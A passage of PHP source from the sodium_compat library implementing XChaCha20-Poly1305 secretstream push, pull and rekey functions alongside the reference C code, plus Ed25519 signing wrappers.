        # memcpy(STATE_INONCE(state), in + crypto_core_hchacha20_INPUTBYTES,
        #     crypto_secretstream_xchacha20poly1305_INONCEBYTES);
        # memset(state->_pad, 0, sizeof state->_pad);
        # return 0;
        return $state->toString();
    }

    /**
     * @param string $state
     * @param string $msg
     * @param string $aad
     * @param int $tag
     * @return string
     * @throws SodiumException
     */
    public static function secretstream_xchacha20poly1305_push(&$state, $msg, $aad = '', $tag = 0)
    {
        $st = ParagonIE_Sodium_Core32_SecretStream_State::fromString($state);
        # crypto_onetimeauth_poly1305_state poly1305_state;
        # unsigned char                     block[64U];
        # unsigned char                     slen[8U];
        # unsigned char                    *c;
        # unsigned char                    *mac;

        $msglen = ParagonIE_Sodium_Core32_Util::strlen($msg);
        $aadlen = ParagonIE_Sodium_Core32_Util::strlen($aad);

        if ((($msglen + 63) >> 6) > 0xfffffffe) {
            throw new SodiumException(
                'message cannot be larger than SODIUM_CRYPTO_SECRETSTREAM_XCHACHA20POLY1305_MESSAGEBYTES_MAX bytes'
            );
        }

        # if (outlen_p != NULL) {
        #     *outlen_p = 0U;
        # }
        # if (mlen > crypto_secretstream_xchacha20poly1305_MESSAGEBYTES_MAX) {
        #     sodium_misuse();
        # }

        # crypto_stream_chacha20_ietf(block, sizeof block, state->nonce, state->k);
        # crypto_onetimeauth_poly1305_init(&poly1305_state, block);
        # sodium_memzero(block, sizeof block);
        $auth = new ParagonIE_Sodium_Core32_Poly1305_State(
            ParagonIE_Sodium_Core32_ChaCha20::ietfStream(32, $st->getCombinedNonce(), $st->getKey())
        );

        # crypto_onetimeauth_poly1305_update(&poly1305_state, ad, adlen);
        $auth->update($aad);

        # crypto_onetimeauth_poly1305_update(&poly1305_state, _pad0,
        #     (0x10 - adlen) & 0xf);
        $auth->update(str_repeat("\0", ((0x10 - $aadlen) & 0xf)));

        # memset(block, 0, sizeof block);
        # block[0] = tag;
        # crypto_stream_chacha20_ietf_xor_ic(block, block, sizeof block,
        #                                    state->nonce, 1U, state->k);
        $block = ParagonIE_Sodium_Core32_ChaCha20::ietfStreamXorIc(
            ParagonIE_Sodium_Core32_Util::intToChr($tag) . str_repeat("\0", 63),
            $st->getCombinedNonce(),
            $st->getKey(),
            ParagonIE_Sodium_Core32_Util::store64_le(1)
        );

        # crypto_onetimeauth_poly1305_update(&poly1305_state, block, sizeof block);
        $auth->update($block);

        # out[0] = block[0];
        $out = $block[0];
        # c = out + (sizeof tag);
        # crypto_stream_chacha20_ietf_xor_ic(c, m, mlen, state->nonce, 2U, state->k);
        $cipher = ParagonIE_Sodium_Core32_ChaCha20::ietfStreamXorIc(
            $msg,
            $st->getCombinedNonce(),
            $st->getKey(),
            ParagonIE_Sodium_Core32_Util::store64_le(2)
        );

        # crypto_onetimeauth_poly1305_update(&poly1305_state, c, mlen);
        $auth->update($cipher);

        $out .= $cipher;
        unset($cipher);

        # crypto_onetimeauth_poly1305_update
        # (&poly1305_state, _pad0, (0x10 - (sizeof block) + mlen) & 0xf);
        $auth->update(str_repeat("\0", ((0x10 - 64 + $msglen) & 0xf)));

        # STORE64_LE(slen, (uint64_t) adlen);
        $slen = ParagonIE_Sodium_Core32_Util::store64_le($aadlen);

        # crypto_onetimeauth_poly1305_update(&poly1305_state, slen, sizeof slen);
        $auth->update($slen);

        # STORE64_LE(slen, (sizeof block) + mlen);
        $slen = ParagonIE_Sodium_Core32_Util::store64_le(64 + $msglen);

        # crypto_onetimeauth_poly1305_update(&poly1305_state, slen, sizeof slen);
        $auth->update($slen);

        # mac = c + mlen;
        # crypto_onetimeauth_poly1305_final(&poly1305_state, mac);
        $mac = $auth->finish();
        $out .= $mac;

        # sodium_memzero(&poly1305_state, sizeof poly1305_state);
        unset($auth);


        # XOR_BUF(STATE_INONCE(state), mac,
        #     crypto_secretstream_xchacha20poly1305_INONCEBYTES);
        $st->xorNonce($mac);

        # sodium_increment(STATE_COUNTER(state),
        #     crypto_secretstream_xchacha20poly1305_COUNTERBYTES);
        $st->incrementCounter();
        // Overwrite by reference:
        $state = $st->toString();

        /** @var bool $rekey */
        $rekey = ($tag & ParagonIE_Sodium_Compat::CRYPTO_SECRETSTREAM_XCHACHA20POLY1305_TAG_REKEY) !== 0;
        # if ((tag & crypto_secretstream_xchacha20poly1305_TAG_REKEY) != 0 ||
        #     sodium_is_zero(STATE_COUNTER(state),
        #         crypto_secretstream_xchacha20poly1305_COUNTERBYTES)) {
        #     crypto_secretstream_xchacha20poly1305_rekey(state);
        # }
        if ($rekey || $st->needsRekey()) {
            // DO REKEY
            self::secretstream_xchacha20poly1305_rekey($state);
        }
        # if (outlen_p != NULL) {
        #     *outlen_p = crypto_secretstream_xchacha20poly1305_ABYTES + mlen;
        # }
        return $out;
    }

    /**
     * @param string $state
     * @param string $cipher
     * @param string $aad
     * @return bool|array{0: string, 1: int}
     * @throws SodiumException
     */
    public static function secretstream_xchacha20poly1305_pull(&$state, $cipher, $aad = '')
    {
        $st = ParagonIE_Sodium_Core32_SecretStream_State::fromString($state);

        $cipherlen = ParagonIE_Sodium_Core32_Util::strlen($cipher);
        #     mlen = inlen - crypto_secretstream_xchacha20poly1305_ABYTES;
        $msglen = $cipherlen - ParagonIE_Sodium_Compat::CRYPTO_SECRETSTREAM_XCHACHA20POLY1305_ABYTES;
        $aadlen = ParagonIE_Sodium_Core32_Util::strlen($aad);

        #     if (mlen > crypto_secretstream_xchacha20poly1305_MESSAGEBYTES_MAX) {
        #         sodium_misuse();
        #     }
        if ((($msglen + 63) >> 6) > 0xfffffffe) {
            throw new SodiumException(
                'message cannot be larger than SODIUM_CRYPTO_SECRETSTREAM_XCHACHA20POLY1305_MESSAGEBYTES_MAX bytes'
            );
        }

        #     crypto_stream_chacha20_ietf(block, sizeof block, state->nonce, state->k);
        #     crypto_onetimeauth_poly1305_init(&poly1305_state, block);
        #     sodium_memzero(block, sizeof block);
        $auth = new ParagonIE_Sodium_Core32_Poly1305_State(
            ParagonIE_Sodium_Core32_ChaCha20::ietfStream(32, $st->getCombinedNonce(), $st->getKey())
        );

        #     crypto_onetimeauth_poly1305_update(&poly1305_state, ad, adlen);
        $auth->update($aad);

        #     crypto_onetimeauth_poly1305_update(&poly1305_state, _pad0,
        #         (0x10 - adlen) & 0xf);
        $auth->update(str_repeat("\0", ((0x10 - $aadlen) & 0xf)));


        #     memset(block, 0, sizeof block);
        #     block[0] = in[0];
        #     crypto_stream_chacha20_ietf_xor_ic(block, block, sizeof block,
        #                                        state->nonce, 1U, state->k);
        $block = ParagonIE_Sodium_Core32_ChaCha20::ietfStreamXorIc(
            $cipher[0] . str_repeat("\0", 63),
            $st->getCombinedNonce(),
            $st->getKey(),
            ParagonIE_Sodium_Core32_Util::store64_le(1)
        );
        #     tag = block[0];
        #     block[0] = in[0];
        #     crypto_onetimeauth_poly1305_update(&poly1305_state, block, sizeof block);
        $tag = ParagonIE_Sodium_Core32_Util::chrToInt($block[0]);
        $block[0] = $cipher[0];
        $auth->update($block);


        #     c = in + (sizeof tag);
        #     crypto_onetimeauth_poly1305_update(&poly1305_state, c, mlen);
        $auth->update(ParagonIE_Sodium_Core32_Util::substr($cipher, 1, $msglen));

        #     crypto_onetimeauth_poly1305_update
        #     (&poly1305_state, _pad0, (0x10 - (sizeof block) + mlen) & 0xf);
        $auth->update(str_repeat("\0", ((0x10 - 64 + $msglen) & 0xf)));

        #     STORE64_LE(slen, (uint64_t) adlen);
        #     crypto_onetimeauth_poly1305_update(&poly1305_state, slen, sizeof slen);
        $slen = ParagonIE_Sodium_Core32_Util::store64_le($aadlen);
        $auth->update($slen);

        #     STORE64_LE(slen, (sizeof block) + mlen);
        #     crypto_onetimeauth_poly1305_update(&poly1305_state, slen, sizeof slen);
        $slen = ParagonIE_Sodium_Core32_Util::store64_le(64 + $msglen);
        $auth->update($slen);

        #     crypto_onetimeauth_poly1305_final(&poly1305_state, mac);
        #     sodium_memzero(&poly1305_state, sizeof poly1305_state);
        $mac = $auth->finish();

        #     stored_mac = c + mlen;
        #     if (sodium_memcmp(mac, stored_mac, sizeof mac) != 0) {
        #     sodium_memzero(mac, sizeof mac);
        #         return -1;
        #     }

        $stored = ParagonIE_Sodium_Core32_Util::substr($cipher, $msglen + 1, 16);
        if (!ParagonIE_Sodium_Core32_Util::hashEquals($mac, $stored)) {
            return false;
        }

        #     crypto_stream_chacha20_ietf_xor_ic(m, c, mlen, state->nonce, 2U, state->k);
        $out = ParagonIE_Sodium_Core32_ChaCha20::ietfStreamXorIc(
            ParagonIE_Sodium_Core32_Util::substr($cipher, 1, $msglen),
            $st->getCombinedNonce(),
            $st->getKey(),
            ParagonIE_Sodium_Core32_Util::store64_le(2)
        );

        #     XOR_BUF(STATE_INONCE(state), mac,
        #         crypto_secretstream_xchacha20poly1305_INONCEBYTES);
        $st->xorNonce($mac);

        #     sodium_increment(STATE_COUNTER(state),
        #         crypto_secretstream_xchacha20poly1305_COUNTERBYTES);
        $st->incrementCounter();

        #     if ((tag & crypto_secretstream_xchacha20poly1305_TAG_REKEY) != 0 ||
        #         sodium_is_zero(STATE_COUNTER(state),
        #             crypto_secretstream_xchacha20poly1305_COUNTERBYTES)) {
        #         crypto_secretstream_xchacha20poly1305_rekey(state);
        #     }

        // Overwrite by reference:
        $state = $st->toString();

        /** @var bool $rekey */
        $rekey = ($tag & ParagonIE_Sodium_Compat::CRYPTO_SECRETSTREAM_XCHACHA20POLY1305_TAG_REKEY) !== 0;
        if ($rekey || $st->needsRekey()) {
            // DO REKEY
            self::secretstream_xchacha20poly1305_rekey($state);
        }
        return array($out, $tag);
    }

    /**
     * @param string $state
     * @return void
     * @throws SodiumException
     */
    public static function secretstream_xchacha20poly1305_rekey(&$state)
    {
        $st = ParagonIE_Sodium_Core32_SecretStream_State::fromString($state);
        # unsigned char new_key_and_inonce[crypto_stream_chacha20_ietf_KEYBYTES +
        # crypto_secretstream_xchacha20poly1305_INONCEBYTES];
        # size_t        i;
        # for (i = 0U; i < crypto_stream_chacha20_ietf_KEYBYTES; i++) {
        #     new_key_and_inonce[i] = state->k[i];
        # }
        $new_key_and_inonce = $st->getKey();

        # for (i = 0U; i < crypto_secretstream_xchacha20poly1305_INONCEBYTES; i++) {
        #     new_key_and_inonce[crypto_stream_chacha20_ietf_KEYBYTES + i] =
        #         STATE_INONCE(state)[i];
        # }
        $new_key_and_inonce .= ParagonIE_Sodium_Core32_Util::substR($st->getNonce(), 0, 8);

        # crypto_stream_chacha20_ietf_xor(new_key_and_inonce, new_key_and_inonce,
        #                                 sizeof new_key_and_inonce,
        #                                 state->nonce, state->k);

        $st->rekey(ParagonIE_Sodium_Core32_ChaCha20::ietfStreamXorIc(
            $new_key_and_inonce,
            $st->getCombinedNonce(),
            $st->getKey(),
            ParagonIE_Sodium_Core32_Util::store64_le(0)
        ));

        # for (i = 0U; i < crypto_stream_chacha20_ietf_KEYBYTES; i++) {
        #     state->k[i] = new_key_and_inonce[i];
        # }
        # for (i = 0U; i < crypto_secretstream_xchacha20poly1305_INONCEBYTES; i++) {
        #     STATE_INONCE(state)[i] =
        #          new_key_and_inonce[crypto_stream_chacha20_ietf_KEYBYTES + i];
        # }
        # _crypto_secretstream_xchacha20poly1305_counter_reset(state);
        $st->counterReset();

        $state = $st->toString();
    }

    /**
     * Detached Ed25519 signature.
     *
     * @internal Do not use this directly. Use ParagonIE_Sodium_Compat.
     *
     * @param string $message
     * @param string $sk
     * @return string
     * @throws SodiumException
     * @throws TypeError
     */
    public static function sign_detached($message, $sk)
    {
        return ParagonIE_Sodium_Core32_Ed25519::sign_detached($message, $sk);
    }

    /**
     * Attached Ed25519 signature. (Returns a signed message.)
     *
     * @internal Do not use this directly. Use ParagonIE_Sodium_Compat.
     *
     * @param string $message
     * @param string $sk
     * @return string
     * @throws SodiumException
     * @throws TypeError
     */
    public static function sign($message, $sk)
    {
        return ParagonIE_Sodium_Core32_Ed25519::sign($message, $sk);
    }

    /**
     * Opens a signed message. If valid, returns the message.
     *
     * @internal Do not use this directly. Use ParagonIE_Sodium_Compat.
     *
     * @param string $signedMessage
     * @param string $pk
     * @return string
     * @throws SodiumException
     * @throws TypeError
     */
    public static function sign_open($signedMessage, $pk)
    {
        return ParagonIE_Sodium_Core32_Ed25519::sign_open($signedMessage, $pk);
    }

    /**
     * Verify a detached signature of a given message and public key.
     *
     * @internal Do not use this directly. Use ParagonIE_Sodium_Compat.
     *
     * @param string $signature
     * @param string $message
     * @param string $pk
     * @return bool
     * @throws SodiumException
     * @throws TypeError
     */
    public static function sign_verify_detached($signature, $message, $pk)
    {
        return ParagonIE_Sodium_Core32_Ed25519::verify_detached($signature, $message, $pk);
    }
}